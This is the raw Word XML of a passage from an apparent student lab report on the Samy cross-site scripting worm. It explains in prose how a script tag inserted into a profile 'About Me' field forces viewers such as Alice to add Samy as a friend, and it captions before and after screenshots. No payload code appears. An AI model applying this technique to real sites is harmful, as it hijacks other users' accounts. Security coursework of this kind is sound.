        </w:rPr>
        <w:t>es,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attack can still be launched. In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t>essense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve">, HTML edit mode displayed “About </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t>Me”field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a HTML tag( p tag), and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t>Samy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, is to insert a HTML script tag parallel to HTML p tag. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve"> can still perform attack by editing the request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t>without frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2519A5ED" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRPr="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t>Screenshot of the attack:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8748" w:type="dxa"/>
        <w:tblInd w:w="-560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7146"/>
        <w:gridCol w:w="1602"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2071" w14:paraId="46580696" w14:textId="77777777" w:rsidTr="00BA2071">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7076" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="037E67B4" w14:textId="17BE8787" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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36212C6" wp14:editId="491D49D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44450</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4400550" cy="274320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672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="067603B0" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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  <w:p w14:paraId="35D4AC9C" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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  <w:p w14:paraId="73160EAC" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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  <w:p w14:paraId="4F5C684A" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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  <w:p w14:paraId="20B0C44E" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="427F9108" w14:textId="2719B7E6" w:rsidR="00BA2071" w:rsidRPr="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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BA2071">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA2071">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>efore</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="235D1E16" w14:textId="0DBA6349" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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lice were not friend to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Samy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2071" w14:paraId="54D4F091" w14:textId="77777777" w:rsidTr="00BA2071">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7076" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A01851B" w14:textId="7C714089" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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C5C2CE" wp14:editId="723DCB2D">
                  <wp:extent cx="3898900" cy="3030783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247" cy="3048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14:paraId="1740C6BF" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D3783FC" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BC5ACEE" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24F893AF" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CA533C1" w14:textId="3BC5CA22" w:rsidR="00BA2071" w:rsidRPr="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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BA2071">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA2071">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>fter:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="675C23C3" w14:textId="6F46728B" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071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r>
              <w:t xml:space="preserve">When browsing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Samy’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> profile, Alice was forced to add </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Samy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> as friend.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2071" w14:paraId="4E05B53C" w14:textId="77777777" w:rsidTr="00BA2071">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7076" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="081DC6C4" w14:textId="7FFD03C6" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph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886B100" wp14:editId="4E618EA3">
                  <wp:extent cx="3953741" cy="2520950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652" cy="2525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2" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4534CA80" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39BB5D39" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26C3E538" w14:textId="77777777" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FE2BDA7" w14:textId="5566D4F9" w:rsidR="00BA2071" w:rsidRPr="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA2071">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA2071">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>esult:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795F09BE" w14:textId="443D5495" w:rsidR="00BA2071" w:rsidRDefault="00BA2071" w:rsidP="00BA2071">
            <w:pPr>
              <w:pStyle w:val="ListParagraph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lice is now </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>samy’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> friend.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63803849" w14:textId="41B261BA" w:rsidR="00C86831" w:rsidRDefault="00C86831" w:rsidP="00BA2071">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C8683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DDFFF" w14:textId="77777777" w:rsidR="002F4D95" w:rsidRDefault="00BA2071">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="002F4D95">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>SY1939111-</w:t>
    </w:r>
    <w:r w:rsidRPr="002F4D95">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>张思嘉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25E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F4E9FEC"/>
    <w:lvl w:ilvl="0" w:tplc="C1381A5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorEastAsia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D4"/>
    <w:rsid w:val="000E0C7D"/>
    <w:rsid w:val="00417BFC"/>
    <w:rsid w:val="00746A0D"/>
    <w:rsid w:val="00BA2071"/>
    <w:rsid w:val="00C86831"/>
    <w:rsid w:val="00CC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B881"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EAA50A7C-28AF-42FE-9917-A37FF587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2D4"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both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C7D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:color w:val="0070C0"/>
      <w:spacing w:val="15"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E0C7D"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:color w:val="0070C0"/>
      <w:spacing w:val="15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CC22D4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C22D4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22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22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C22D4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C22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22D4"/>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="start-tag">
    <w:name w:val="start-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC22D4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="attribute-name">
    <w:name w:val="attribute-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC22D4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="end-tag">
    <w:name w:val="end-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CC22D4"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA20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zhang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>winnie zhang</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2020-03-23T07:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-23T07:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-23T10:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>